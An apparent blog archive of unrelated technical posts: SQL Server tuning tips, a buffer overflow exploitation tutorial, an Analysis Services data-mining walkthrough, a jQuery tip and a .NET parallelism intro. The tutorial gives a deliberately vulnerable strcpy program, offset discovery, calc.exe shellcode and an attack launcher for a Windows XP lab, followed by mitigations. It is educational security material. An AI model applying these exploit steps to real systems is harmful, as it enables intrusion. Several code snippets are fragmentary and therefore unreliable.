SQL Query Optimization and Performance Guide


Windows Settings    3

Storage on 2 Physical disks – standard solution    7

Storage on 3 Physical disks – extended solution    7

Storage on 4 physical disks – optimal solution    7

Storage on external hard disk or flash memory    9

Database Auto growth    9

Index Management    9

Stored procedures    12

Cursors    12

Query optimization    13

Scheduled Maintenance Plan    13

Check disk usage by top tables    14

Windows Settings

  • Adjust performance for background services
  • Configure size of windows paging file(virtual memory) to be twice the size of physical memory
  • Turn off system protection feature for all disks except for C
  • Disable unneeded sql services
  • Configure weekly defragmentation schedule for all disks

Storage on 2 Physical disks – standard solution

  • Store log file on C
  • Store data file on the second disk

Storage on 3 Physical disks – extended solution

  • Store data file on second disk
  • Store log file on third disk
  • Store Windows Paging File(Virtual Memory) on C

Storage on 4 physical disks – optimal solution

  • Store windows paging file on C
  • Store primary data file on second disk
  • Store log file on third disk
  • Create Secondary data file on fourth disk to store indexes

    When creating indexes, select the secondary file group

Storage on external hard disk or flash memory

  • Not allowed
  • This will disable all optimizations performed by SQL Server
  • This will limit read/write speed to 25Mbits/sec for external hard disk and slower for flash memory

Database Auto growth

  • Do not set to grow in %. Use static value instead(100MB is good option)

Index Management

  • Create non-clustered index only for tables that have rate of SELECT much larger than rate of INSERT and UPDATE
  • Do not create indexes for all table columns
  • For indexes created on base tables(for example Person, Admission, AdmissionRequestDetail), set the index fill factor to 70 instead of 80(default option). This will enhance performance for INSERT.
  • Use the following procedure to analyze index fragmentation. You should “reorganize” indexes when the External Fragmentation value for the index is between 10-15 and the Internal Fragmentation value is between 60-75. Otherwise, you should rebuild indexes.











    <> 0)

    si.index_id=dt.index_id AND dt.avg_fragmentation_in_percent>10

    dt.avg_page_space_used_in_percent<75 ORDER
    BY avg_fragmentation_in_percent



  • Create non-clustered indexes only for columns that appear in:
    • Where clause
    • Order By clause
    • Join clause
    • Distinct
    • All foreign keys
  • Avoid indexing small tables
  • Create indexed views for columns used by Linq query in the where clause, if the index is not created on the table but do not create the index on both.
  • Do not use Year(), Month() ,Day() functions in the where clause on a column even if it has an index. Using these functions and other similar functions will disable the index and will do a full table scan. So change the query to make use of the index. Example:



  • Use the index usage report to check if there are unused indexes on the table in order to delete them. If the number of seeks is 0. The index can be deleted.

Stored procedures

  • Do not name the procedure sp_something. This will cause a delay when the procedure executes.
  • Use Set Nocount On at the top of the procedure to avoid additional round trip to the server
  • Try to avoid using exec of dynamic sql statements


  • Do not use a cursor to iterate over a set of records. Creating and using a cursor is very expensive and resource consuming. Instead, use a while loop with defined upper bound. This option is not available for SQL 2000. Example:





    from SubDepartment

        while (@i<=@count)





Query optimization

  • Do not use OR in the where clause. Instead, use UNION ALL to implement OR functionality but only if there is an index on the column used in OR operator. If there is no index, this optimization will slow down performance by doing multiple table scans. If there is an index this approach will speed up the query. Example:

    person.Sex=0 or person.Sex=1

    person.Sex=0 union


  • Avoid using inline queries, use joins instead
  • Avoid using inline function in the query. Instead, create a precomputed column with the function formula to be stored for selection in the query. May not be applicable for all cases.
  • When writing queries containing NOT IN, the query will have poor performance as the optimizer need to use nested table scan to perform this activity. This can be avoided by using EXISTS or NOT EXISTS
  • When you have the choice to use IN or BETWEEN clause in the query, always use BETWEEN. This will speed up the query
  • When having multiple columns in where clause separated by AND operator, make sure to order the columns from least likely true to most likely true if the expected result is most likely true. Otherwise, order the columns from most likely false to least likely false. In other words, the condition that filters the least number of records must appear first in the where clause.
  • For queries that require immediate feedback to the user, use FAST n option to immediately return first n records while the query continues to fetch the remaining records. This option can be used in procedures and views but it does not apply for linq queries because .ToList() ignores this option. Example:

    OPTION(FAST 100)

Scheduled Maintenance Plan

  • Use daily maintenance plan to perform daily cleanup, update statistics, check integrity, rebuild indexes, organize indexes, shrink database files and perform a full backup.
  • Do not include system databases in the plan. Select the option “User databases only”
  • Make sure SQL Server Agent startup option is set to Automatic
  • Schedule the plan to run daily at night. 1am is a good option.
  • The below plan is standard and can be used for most cases.

Check disk usage by top tables

  • Monitor disk usage by most used tables. These will be the target for potential indexes.
  • Use this approach to check if the application is performing repeated unnecessary reads

Exploit the buffer – Buffer Overflow Attack

Exploit the buffer – Buffer Overflow Attack

Theoretical Introduction:

A program is a set of instructions that aims to perform a specific task. In order to run any program, the source code must first be translated into machine code. The compiler translates high level language into low level language whose output is an executable file. In order to simplify the machine code representation to the user it is displayed in hexadecimal format. The executable file is then run in memory which is divided into two parts which are the text part and the data part [1]. In memory, the machine code of a program is loaded into the memory text part which is a read only area and can’t be changed [1]. If the program contains any static variables such as the global variables or constants, then these static variables are stored in a part of memory called the static data [1]. Then during the program runtime the instructions are allocated in memory on either the heap or the stack depending on the type of memory allocation used to allocate the variables (by value or by reference). This process of memory allocation for the text memory part followed by the static data part followed by the stack or heap is done from lower to higher memory addresses [1]. The heap grows from lower to higher memory addresses whereas in the stack data is allocated from higher to lower memory based on the concept of Last in First out (LIFO) where the last element that enters the stack is the first one to go out (Fig.1) [1]. The stack is a continuous space in memory where the information about any running function is stored which can be either data or addresses.

Figure 1

For example, assume we have the following program [2]:

void fn1() {


char buffer1[5];


char buffer2[10];




void main() {






By looking at the assembly language output we see that the call to fn1() is translated to:


push %ebp


mov %esp,%ebp


sub $20,%esp

The stack allocation of the above program is shown below:

High Memory

Return address of main






Low Memory


The ESP, EBP and EIP registers are 32 bit cpu registers. The ESP register (stack pointer) always points to the top of the stack where the last element in the stack is stored (the lowest memory address). The EBP register (base pointer) is used to point to the current frame pointer which corresponds to a call to a function that hasn’t returned yet. The EIP register contains the address of the next instruction to be executed.

Each time a function is called the address of the next instruction following the call is pushed into the stack, this value is obtained from the EIP register of the cpu. The return address is stored in the stack in order to return back correctly to the next instruction following the function call. After pushing the EIP value, the EBP value obtained from the EBP register of the cpu is pushed into the stack which corresponds to a new frame pointer for the currently called function. The ESP register always points to the top of the stack. Memory is always allocated in blocks of word size that’s why buffer1 is allocated 8 bytes instead of 5 and buffer2 is allocated 12 bytes instead of 10 [2].

Hackers can utilize the vulnerability of having the return address stored in the stack and try to overflow the buffer by entering data larger than its allocated size in the stack by taking advantage of the lack of boundary checking of C or C++ code for some instructions. The instructions that lack boundary checking include: gets(), strcpy(), strcat(), sprintf(), vsprintf(), scanf(), sscanf(), fscanf(),… [3]

Buffer flow vulnerabilities have been increasing recently [1]. Attackers who exploit the buffer overflow vulnerability take the advantage of the presence of the return address of a running function in the stack and try to change this return address in order to execute any executable file they choose or simply crash the system. This can be achieved by overflowing the buffer with data larger than its size until reaching the location of the return address in the stack. This return address can be overwritten by the address of a malicious code causing the program to execute this malicious code instead of returning to the main. The return address can also be written by any data causing the program to jump to an unidentifiable address and thus causing a segmentation error and causing the program to crash [4].

Brief Outline of the Steps

The hacker trying to achieve a buffer overflow should undergo the following steps:

  1. He should identify the existence of buffer overflow vulnerability. When a user enters a long string of characters as an input to a program and the program displays access violation error then this program is identified as having buffer overflow vulnerability and now the hacker can use this program as its target to execute malicious code.
  2. He should identify the location of return address inside the stack. Identifying the buffer size is not sufficient enough to identify the return address location in the stack because there is sometimes an unidentified number of junk between the ebp and the eip values stored in the stack. The return address location is found by performing a brute force where a long string of distinct characters are entered as an input (each character is repeated four times so that it occupies one word location e.g., AAAABBBBCCCCDDDD), and ollydbg is used to identify which character of the above entered characters is stored in the return address and thus the location of the return address is identified.
  3. He should find the shellcode of the code he wants to execute. This shellcode is entered as input into the vulnerable program where nops (no operation) are used in case the shellcode doesn’t fill the entire buffer. Ollydbg is then used to identify the address of this shellcode.
  4. He should write and run the program function that will execute the vulnerable code containing buffer overflow where the shellcode is written into the buffer and Nops are added if there are additional unfilled bytes in the buffer, and the address of the start of the buffer is placed into the return address in the stack.

List of Machines and Software Used

  • Windows xp sp2
  • Microsoft visual studio framework(Buffer security check turned off)
  • C or C++ code containing at least one of the buffer overflow vulnerable instructions.
  • Ollydbg

Attack Explained

  1. Write the following C application which simply copies an input string into a buffer of size 49 bytes:

#include <stdio.h>

#include <stdlib.h>

#include <conio.h>

#include <string.h>

int fn1(char *str){

    char local[49];


return 0;


int main(int argc,char * args[]){


return 0;


  1. Call the program by passing input string of size less than 49 characters, the program executes normally:

    Open cmd and type buffer.exe AAAABBBBCCCC

  1. Try to discover the presence of the buffer overflow vulnerability in the C code by passing a large string parameter.

Open cmd and type:


Since this program displayed an error when we enter a long string of characters as an input, then this program is identified as containing the buffer overflow vulnerability and can now be used as our target to execute shellcode. The program has the buffer overflow vulnerability because it uses the strcpy instruction which copies the input instruction into a string of size 49 characters. So if we enter a string having size larger than 49 characters, the stack will be corrupted because the return address saved in the stack is overwritten with an address from the string that is an unidentifiable address. Hackers can now exploit this vulnerability by entering a large string that overwrites the return address with the address of their malicious code.

  1. Try to identify the location of the return address in the stack.
    1. open buffer.exe using the ollydbg and pass the following long string parameter:


      Each character is repeated 4 times so that each letter occupies a word size memory location.

    2. Keep on pressing run until reaching the return instruction. Press run and check the value of EIP in the registers panel:

    3. The value of EIP is 4F4F4F4F which is the hexadecimal representation of OOOO.

We conclude that the return address is located 56 characters from the beginning of the input string:

52 bytes are reserved in the stack for the buffer of size 49. This buffer reserved 52 bytes instead of 49 bytes because memory is allocated in terms of word size which is 4 bytes.

The following 4 bytes are reserved for the value of the ebp register.

After 56 bytes from the string start the return address which is the value of the eip register is found. The stack looks like the following:

OOOO (place of the Return address which is the value of EIP)

So now any 4 bytes we place after the following string

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKLLLLMMMMNNNN (which will be replaced by shellcode) will replace the contents of the return address and the program will now jump to the entered address in the return address location instead of returning back to the main.

  1. Now that we have identified the location of the return address we need to write our shellcode that will run a calculator and call exit so that no error will be displayed to the user and he won’t know that his code has been exploited.

The steps are the following:

  1. Find the assembly code of WinExec and how it is called from the documentation of windows global _start
  2. _start:
  3. jmp short GetCommand
  4. CommandReturn:
  5.      pop ebx     ;ebx now holds the handle to the string
  6.      xor eax,eax
  7.      push eax
  8.      xor eax,eax     ;for some reason the registers can be very volatile, did this just in case
  9.      mov [ebx + 89],al     ;insert the NULL character
  10.      push ebx
  11.      mov ebx,0x758ee695
  12.      call ebx     ;call WinExec(path,showcode)
  13.      xor eax,eax     ;zero the register again, clears winexec retval
  14.      push eax
  15.      mov ebx, 0x758b2acf
  16.      call ebx     ;call ExitProcess(0);
  17. GetCommand:
  18.     ;the N at the end of the db will be replaced with a null character
  19.     call CommandReturn
  20.     db “calc.exe”

  21. Find the address of WinExec and ExitProcess using arwin tool. These addresses are different on every machine.

  1. Replace the old addresses of WinExec and ExitProcess in the assembly code with the new addresses found.

  2. Extract the assembly code and compile it to object code using nasm tool.

  1. Convert the object code to opcode using ld tool.

  1. Dump the shellcode using objdump tool.

Now we have found the shellcode of running a calculator followed by an exit which is the following:


This shellcode will be written in place of the buffer and since the shellcode size is less than the buffer size we add nops (no operations) at the beginning of the buffer which won’t affect the code. The nop is represented by \x90.

  1. Now we need to find the address of the buffer because the shellcode is written in its place. To find this address we will use the ollydbg.
    1. Open buffer.exe using the ollydbg and pass the following parameter:


    2. Look into the stack place and scroll up to find the following pattern of hexadecimals :


      The address of buffer is identified as 0013FF40 (the place of 41414141 which is the hexadecimal representation of AAAA). Now we know the address of the shellcode is 0013FF40 which is represented as \x40\xFF\x13. We avoid using the null character \x00 because it would terminate the string.

  2. Create the attack application which calls buffer.exe with our shellcode:

    #include <stdio.h>

    #include <windows.h>

    int main (){

    //the executable filename of the vulnerable app

    char xp[70]=”buffer.exe “;

    //Address of the shellcode

    char ret[]= “\x40\xFF\x13”;

    //the shellcode of calc.exe winxp followed by exit

    char of[] =


    // concatenated buffer.exe by the shellcode followed by the address of the shellcode



    //execute the concatenated string


    return 0;


    Note that few NOPS were added at the beginning of the shellcode in order to fill the buffer since the shellcode doesn’t fill it completely. The stack will look like the following:

  1. Finally, execute the exploit:

The overflow has been successfully executed since the calculator has been run.

How to avoid Buffer overflows

  • Try to use different languages that can do bound checking other than C or C++. But if you’re writing a C or C++ code use instructions that perform bound checking. For example, instead of using the strcpy or strcat instructions use the strncat or the strncpy [1].
  • Try to write secure programs by writing additional code that can do bound checking [1].
  • You can use tools that can analyze the source code for any buffer overflow vulnerabilities [1].
  • Patch the system, since new systems have been developed taking buffer overflow into consideration to avoid it [1].
  • Set the buffer security check to positive in the properties of the running program in the visual studio framework. This will disable buffer overflow vulnerability from hacking the program and identifying the return address location.


[1] http://www.sans.org/reading_room/whitepapers/securecode/buffer-overflow-attack-mechanism-method-prevention_386

[2] http://insecure.org/stf/smashstack.html

[3] http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/buffer-overflow.html

[4] http://www.cs.umass.edu/~trekp/csc262/lectures/04c.pdf

[5] http://www.acsac.org/2005/papers/119.pdf

[6] http://isis.poly.edu/kulesh/stuff/etc/bo.pdf

[7] http://ieeexplore.ieee.org/Xplore/login.jsp?url=http%3A%2F%2Fieeexplore.ieee.org%2Fiel5%2F6658%2F17794%2F00821514.pdf%3Farnumber%3D821514&authDecision=-203

Data mining in Sql Server 2008 & Visual Studio

Architecture of Microsoft SQL S

Image via Wikipedia

Creating a Project in the Business Intelligence Development Studio

Follow these steps to create a new project. To start BIDS, click the Start button and go to All Programs->Microsoft SQL Server 2008->SQL Server Business Intelligence Development Studio. In BIDS, select File New Project. You will see the Business Intelligence Projects template. Click the Analysis Services Project template. Type “AnalysisServices2008Tutorial” as the project name and select the directory in which you want to create this project. Click OK to create the project.

The Solution Explorer Pane

The Solution Explorer contains the following:

1) Data source objects: They contain details of a connection to a data source, which include server name, catalog or database name, and login credentials. You establish connections to relational servers by creating a data source for each one.

2) Data Source Views: When working with a large operational data store you don’t always want to see all the tables in the database. With Data Source Views (DSVs), you can limit the number of visible tables by including only the tables that are relevant to your analysis.

3) Cubes: A collection of measure groups (from the fact tables) and a collection of dimensions form a cube. Each measure group is composed of a set of measures. Cubes can have more than three dimensions and not necessarily the three – dimensional objects as their name suggests.

4) Dimensions: They are the set of tables that are used for building the cube. Attributes that are needed for the analysis task are selected from each table.

5) Mining Structures: Data mining is the process of analyzing raw data using algorithms that help discover interesting patterns not typically found by ad – hoc analysis. Mining Structures are objects that hold information about a data set. A collection of mining models form a mining structure. Each mining model is built using a specific data mining algorithm and can be used for analyzing patterns in existing data or predicting new data values.


The Properties Pane


If you click an object in the Solution Explorer, the properties for that object appear in the Properties pane. Items that cannot be edited are grayed out. If you click a particular property, the description of that property appears in the Description pane at the bottom of the Properties pane.




Data mining in sql server 2008


The data mining process is regarded as a series of steps to be followed which include the following:

1) Creating a Data Source:

Cubes and dimensions of an Analysis Services database must retrieve their data values from tables in a relational data store. This data store, typically part of a data warehouse, must be defined as a data source.

To create a data source, follow these steps:

a) Select the Data Sources folder in the Solution Explorer.

b) Right – click the Data Sources folder and click New Data Source. This launches the Data Source Wizard.

c) In the data source wizard you will provide the connection information about the relational data source that contains the “Adventure Works DW 2008” database. Click the New button under Data Connection Properties to specify the connection details. You will enter here the server name, the database name, and choose one of the two authentication modes either sql server authentication or windows authentication.

d) In the Impersonation Information page you need to specify the impersonation details that Analysis Services will use to connect to the relational data source. There are four options. You can provide a domain username and password to impersonate or select the Analysis Service instance’s service account for connection. The option Use the credentials of the current user is primarily used for data mining where you retrieve data from the relational server for prediction. If you use the Inherit option, Analysis Services uses the impersonation information specified for the database.

e) On the final page, the Data Source Wizard chooses the relational database name you have selected as the name for the data source object you are creating. You can choose the default name specified or specify a new name here.

2) Creating a Data Source View ( DSV )

The Adventure Works DW database contains 25 tables. The cube you build in this chapter uses 10 tables. Data Source Views give you a logical view of the tables that will be used within your OLAP database.

To create a Data Source View, follow these steps:

a) Select the Data Source Views folder in the Solution Explorer.

b) Right – click Data Source Views and select New Data Source View. This launches the Data Source View Wizard.

c) In the data source view wizard you can select the tables and views that are needed for the Analysis Services database you are creating. Click the > button

so that the tables move to the Included Objects list. We will include in the data source view here the following set of tables:

FactInternetSales, FactResellerSales, DimProduct, DimReseller, DimPromotion, DimCurrency, DimEmployee, DimSalesTerritory, DimTime, DimCustomer, Dim Geography.

d) At the final page of the DSV Wizard you can specify your own name for the DSV object or use the default name. Specify the “Adventure Works DW” for the DSV Name in the wizard and click Finish.

If you open the data source view in the solution explorer the data source view editor opens which contains three main areas: Diagram Organizer, the Tables view, and the Diagram view. In the diagram view you can see a diagram of all the added tables with their relationships among each other. In the tables view you can see all the tables that are contained in this data source view. In the diagram organizer, you can right click in the pane here to create a new diagram and drag and drop the tables that u wish to add, or simply add any table u want then right click on it and choose add related tables, this will add all the related tables to the given chosen table. In order to add a new field to a given table, you simply right click on the table in the diagram view and choose add named reference, a dialog will appear where you can enter the name of the new field and the formula upon which it is derived. For example, to add a new field named FullName to the table employee, you write the following formula: FirstName + ‘ ‘ + MiddleName + ‘ ‘ + LastName.

There are different layouts in the data source view. You can switch between rectangular layout and diagonal layout in the DSV by right – clicking in the DSV Designer and selecting the layout type of your choice.

To see a sample of the data specified by your DSV, right – click a table in the DSV Designer and select Explore Data. The data presented is only a subset of the underlying table data. By default the first 5,000 rows are retrieved and shown within this window. You can change the number of rows retrieved by clicking the Sampling Options button. Clicking the Sampling Options button launches the Data Exploration Options dialog where you can change the sampling method, sample count, and number of states per chart, which is used for displaying data in the chart format.

When you click the Pivot Table tab you get an additional window called PivotTable Field List that shows all the columns of the table. You can drag and drop these columns inside the pivot table in the row, column, details, or filter areas. The values in the row and column provide you with an intersection point for which the detailed data is shown.

3) Creating New Dimensions

Dimensions help you define the structure of your cube so as to facilitate effective data analysis. Specifically, dimensions provide you with the capability of slicing data within a cube, and these dimensions can be built from one or more dimension tables.

a) Create the DimGeography dimension:

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension.

 In the Select Creation Method screen select the “Use an existing table” option and click next.

 In the Specify Source Information page, you need to select the DSV for creating the dimension, select the main table from which the dimension is to be designed, specify the key columns for the dimension, and optionally specify a name column for the dimension key value. By default, the first DSV in your project is selected. Because the current project has only one DSV (the Adventure WorksDW DSV), it is selected. Select the DimGeography table from the Main table drop – down list.

 Click the Next button to proceed to the next step in the Dimension Wizard.

 The Dimension Wizard now analyzes the DSV to detect any outward – facing relationships from the DimGeography table. An outward – facing relationship is a relationship between the DimGeography table and another table, such that a column in the DimGeography table is a foreign key related to another table. The Select Related Tables screen shows that the wizard detected an outward relationship between the DimGeography table and the DimSalesTerritory table. In this example you will be modeling the DimGeography table as a star schema table instead of snowflake schema. Deselect the DimSalesTerritory table and click next.

 The Select Dimension Attributes screen of the Dimension Wizard displays the columns of the main table that have been selected for the dimension you’re creating.

 Select all the attributes of the DimGeography table (all the attributes in the screen), leave their Attribute Type as Regular, allow them to be browsed, and click next.

 The final screen of the Dimension Wizard shows the attributes that will be created for the dimension based on your choices in the wizard. Click the Finish button.

Open the DimGeography dimension by double clicking on it in the solution explorer. In the Dimension structure tab you can see all the table attributes that have been added to this dimension. In the hierarchies’ pane, drag and drop the English country region name attribute followed by the State Province Name followed by the city and then the postal code. Then you have to build the relationships among these attributes in the hierarchy by clicking on the attribute relationships tab, and then dragging the postal code attribute towards the city, this means that the postal code value determines

the city. Drag the city towards the state. Drag the state towards the country. This will build the functional dependencies among the attributes in the hierarchy. Then you have to ensure that the city value is unique in determining the state name value by setting the key columns property of the city attribute to both the state province code and city, and setting its name columns to the city attribute. Similarly set the key columns of the postal code attribute to the postal code, the city, and the state province code attributes, and set its name columns to the postal code.

Deploy the project, by right clicking the project name and choosing deploy. After a successful deployment, you can browse the dimension by selecting the browse tab, where you can see all the data of the dimgeography table arranged according to their hierarchical levels.

b) Create the DimTime dimension

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension. When the welcome screen of the Dimension Wizard opens up, click next.

 In the Select Creation Method page of the wizard, select the “Use an existing table” option and click next.

 In the Specify Source Information page, select DimTime as the main table from which the dimension is to be designed and click next.

  In the Select Dimension Attributes page, in addition to the Date Key attribute, enable the checkboxes for the following attributes: Calendar Year, Calendar Semester, Calendar Quarter, English Month Name, and Day Number of Month.

 Set the Attribute Type for the “Calendar Year” attribute to Date Calendar Year.

 Set the Attribute Type for the “Calendar Semester” attribute to Date Calendar Half Year.

 Set the Attribute Type for the “Calendar Quarter” attribute to Date Calendar Quarter.

 Set the Attribute Type for the “English Month Name” attribute to Date Calendar Month.

 Set the Attribute Type for the “Day Number of Month” attribute to Date Calendar Day of Month.

 Create a multilevel hierarchy Calendar Date with the levels Calendar year, Calendar Semester, Calendar Quarter, Month (rename English Month Name), and Day (rename Day Number Of Month).

 Save the project and deploy it to the analysis services instance.

 Switch to the Browser pane of the DimTime dimension, where you can see that the date hierarchy is arranged according to the hierarchy that we defined above.

c) Create the DimEmployee dimension

 Launch the Dimension Wizard by right – clicking Dimensions in the Solution Explorer and selecting New Dimension. If the welcome screen of the Dimension Wizard opens up, click next.

 Make sure the “Use an existing table” option is selected and click next.

 In the Specify Source Information page, select DimEmployee as the main table from which the dimension is to be designed and click next.

 On the Select Related Tables screen, uncheck the DimSalesTerritory table and click next.

 In the Select Dimensions Attributes dialog, the Dimension Wizard has detected three columns of the DimEmployee table to be included as attributes. The Dimension Wizard will select columns if they are either the primary key of the table or a foreign key of the table or another table in the DSV. The attributes suggested by the Dimension Wizard in this example are the key attribute Employee Key, the parent – child attribute Parent Employee Key, and the Sales Territory Key, which is a foreign key column to the DimSalesTerritory table.

 Select all the columns of the DimEmployee table as attributes and click next.

 Double – click the DimEmployee dimension in the Solution Explorer to open the Dimension Designer.

 Change the NameColumn property of the Key attribute Dim Employee to FullName and deploy the project to your Analysis Services instance.

When you browse the Parent – Child hierarchy, you will see the members of the hierarchy showing the full names of the employees.

4) Creating a Cube Using the Cube Wizard

Cubes are the principal objects of an OLAP database that help in data analysis. Cubes are multidimensional structures that are primarily composed of dimensions and facts. The data from a fact table that is stored within the cube for analysis are called measures.

To build a new cube, follow these steps:

a) Right – click the Cubes folder and select New Cube. Click next on the introduction page to proceed.

b) In the Select Creation Method page you have the option to build a cube from existing tables, create an empty cube, or create a cube based on a template and generate new tables in the data source. Choose to build the cube from the existing tables in the Adventure Works DW data source. Click Next to proceed to the next step in the Cube Wizard.

c) The next page of the Cube Wizard is the Measure Group Tables selection page. You now must select one or more tables that will serve as fact tables for your Measure Group. The Suggest button on this screen can be used to have the Cube Wizard scan the DSV to detect the fact tables in the DSV and

detect fact tables. Click the Suggest button to have the Cube Wizard automatically select potential Measure Group tables. The Cube Wizard now scans the DSV to detect the fact and dimension tables in the DSV, automatically selects the candidate tables. Any table that has an outgoing relationship is identified as a candidate fact table, whereas a table that has an incoming relationship is detected as a dimension table. Select both the FactResellerSales and the FactInternetSales as the fact tables. And then select the measures that you need to include from these fact tables for the analysis task.

d) In the Select Existing Dimensions page, the Cube Wizard displays a list of all existing dimensions defined in the project. Accept the selection of all the dimensions and click next.

e) The Cube Wizard asks you to select any new dimensions to be created from existing tables in the data source that are not already used for dimensions in the project. You can deselect dimensions that are not needed for your cube on this page. This illustration will use the Fact tables only as measure groups and not for dimensions. Deselect the Fact Reseller Sales and Fact Internet Sales dimensions on this page and click next.

f) In the final page of the Cube Wizard you can specify the name of the cube to be created and review the measure groups, measures, dimensions, attributes, and hierarchies. Use the default name Adventure Works DW suggested by the Cube Wizard and click Finish.

After creating the cube, the new dimensions are automatically created. But these dimensions will have only their primary and foreign keys selected. You have to open each created dimension and select the attributes that you need to add from each table.

g) Press F5 to deploy, build and process the cube. Deploying the cube means building the cube according to the structure that you have defined, while processing the cube means computing all the aggregation values for all the cells in the cube.

You can add a new calculated measure to the cube by Right – clicking in the Script Organizer pane of the Calculation Scripts tab and entering the formula for this new measure.

Now that the cube has been deployed, switch the BIDS Cube Designer view to the Browser page. In the Browser page you will see three panes: a Measure Group pane, a Filter pane, and a Data pane. Suppose you want to analyze the Internet sales of products based on the promotions offered to customers and the marital status of those customers. First you would need to drag and drop [DimPromotion].[English Promotion Type] from the Measure Group pane to the OWC rows area. Next, drag and drop [Dim Customer].[Marital Status] from the Measure Group pane to the OWC columns area. Finally, drag and drop the measure [Sales Amount] from the Fact Internet Sales measure group to the Drop Totals or Detail Fields Here area of the OWC pane.

You can also use MDX queries to query the cube. These MDX queries are similar to the sql server queries. Just as SQL (Structured Query Language) is a query language used to retrieve data from relational databases, MDX (Multi – Dimensional expressions) is a query language used to retrieve data from multidimensional databases.

The format of MDX query is shown below:

SELECT [< axis expression >, [< axis expression > …]]

FROM [< cube_expression >]

[WHERE [slicer expression]]

5) Creating a Mining Structure

Analysis Services 2008 provides nine data mining algorithms that can be utilized to solve various business problems. These algorithms can be broadly classified into five categories based on the nature of the business problem they can be applied to. They are:

1) Classification

2) Regression

3) Segmentation

4) Sequence analysis

5) Association

We aim at grouping customers that undergo similar characteristics.

To create a relational mining model, follow the following steps:

a) Right – click the Mining Structures folder in the Solution Explorer and select New Mining Structure as to launch the Data Mining Wizard that helps you to create data mining structures and models. Click the Next button.

b) Select the “From existing cube” radio button and click next.

c) Select Microsoft Clustering and click next.

d) Choose the Customer table as the primary table and enter the following attributes as inputs for building clusters:

Age, Yearly Income, Number of cars owned, Number of Children at home and Occupation.

You will now see the clustering mining model represented as several nodes with lines between these nodes. By default the clustering mining model groups the customer into ten different clusters. The number of clusters generated can be changed from a property for the cluster mining model. Each cluster is shown as a node in the cluster viewer. Darker shading on the node indicates that the cluster favors a specific input column and vice versa. If there is a similarity between two clusters, it is indicated by a line connecting the two nodes. Similar to the shade of the color node, if the relationship is stronger between two nodes, it is indicated via a darker line. You can move the slider on the left of the cluster diagram from All Links to Strongest Links. As you do this you can see the weaker relationships between the clusters are not displayed. You can change the cluster name by right – clicking the cluster and selecting Rename. You can select desired input columns of the mining model from the Shading Variable drop –

down to see the effect of the column on the various clusters. When you choose a specific shading variable column you need to choose one of the states of the column to be used as the shading variable for the clusters.

The Cluster Profiles view shows the relationship between the mining columns of the model and the clusters in a matrix format. The intersection cell of a specific column and a cluster shows a histogram bar of the various values of the column that are part of the cluster. The size of each bar reflects the number of items used to train the model.

The cluster Characteristics tab shows the characteristics of a single cluster and how the various states of the input columns make up the cluster.

The Cluster Discrimination tab shows the characteristics of a Cluster in comparison with the characteristics of the complement of this Cluster.

Adding IntelliSense for JQuery in Visual Studio 2008

To set up IntelliSense for JQuery you will need to download the JQuery Documentation File
from the JQuery site.

At the top of the JavaScript file in which you would like to have jQuery IntelliSense enabled, you will need to add a line to reference
the documentation file:

                                        /// <reference path="jquery-1.3.2-vsdoc2.js" />

If you downloaded jQuery and saved it to your project Visual Studio will look for the vsdoc.js file automatically if
the following conditions are met.

  • You downloaded and installed the hotfix for Visual Studio.
  • jQuery and the documentation file need to be named the same with the exception that the documentation file end with -vsdoc.js.
    So when you add jQuery to your project make sure to rename them similarly. For instance, jquery-1.3.2.js is your jQuery library,
    Visual Studio will look for the documentation file at jquery-1.3.2-vsdoc.js and load it.

    (Note: the jQuery 1.3.2 documentation file is named jquery-1.3.2-vsdoc2.js on the Download page so make sure you take out
    the 2 so that the file will be found by Visual Studio).

  • To test to make sure the documentation file loaded correctly, you can type $( and you should be presented with some documentation.

Parallel Programming Concepts in .Net Framework

The .NET Framework stack

Image via Wikipedia


  1. Working With Shared-Memory Multicore.
  2. Shared-Memory and Distributed-Memory Systems.
  3. Parallel Programming and Multicore Programming.
  4. Hardware Threads and Software Threads.
  5. Amdahl’s Law.
  6. Gustafson’s Law.
  7. Working with Lightweight Concurrency.
  8. Creating Successful Task-Based Designs.
  9. Designing With Concurrency in Mind.
  10. Interleaved Concurrency, Concurrency, and Parallelism.
  11. Minimizing Critical Sections.

Working With Shared-Memory Multicore

Most machines today have at least a dual-core processor. However, quadcore and octal-core processors, with four and eight cores, respectively, are quite popular on servers, advanced workstations, and even on high-end mobile computers. Modern processors offer new multicore architectures. Thus, it is very important to prepare the software designs and the code to exploit these architectures. The different kinds of applications generated with C# 2010 and .NET Framework 4 run on one or many CPUs. Each of these processors can have a different number of cores, capable of executing multiple instructions at the same time.

Multicore processor can be simply described as many interconnected processors in a single package. All the cores have access to the main memory, as illustrated in figure below. Thus, this architecture is known as sharedmemory multicore. Sharing memory in this way can easily lead to a performance bottleneck.

Multicore processors have many different complex architectures, designed to offer more parallel-execution capabilities, improve overall throughput, and reduce potential bottlenecks. At the same time, multicore processors try to reduce power consumption and generate less heat. Therefore, many modern processors can increase or reduce the frequency for each core according to their workload, and they can even sleep cores when they are not in use. Windows 7 and Windows Server 2008 R2 support a new feature called Core Parking. When many cores aren’t in use and this feature is active, these operating systems put the remaining cores to sleep. When these cores are necessary, the operating systems wake the sleeping cores.

Modern processors work with dynamic frequencies for each of their cores. Because the cores don’t work with a fixed frequency, it is difficult to predict the performance for a sequence of instructions.

For example, Intel Turbo Boost Technology increases the frequency of the active cores. The process of increasing the frequency for a core is also known as overclocking.

If a single core is under a heavy workload, this technology will allow it to run at higher frequencies when the other cores are idle. If many cores are under heavy workloads, they will run at higher frequencies but not as high as the one achieved by the single core. The processor cannot keep all the cores overclocked for a long time, because it consumes more power and its temperature increases faster. The average clock frequency for all the cores under heavy workloads is going to be lower than the one achieved for the single core. Therefore, under certain situations, some code can run at higher frequencies than other code, which can make measuring real performance gains a challenge.

Shared-Memory and Distributed-Memory Systems

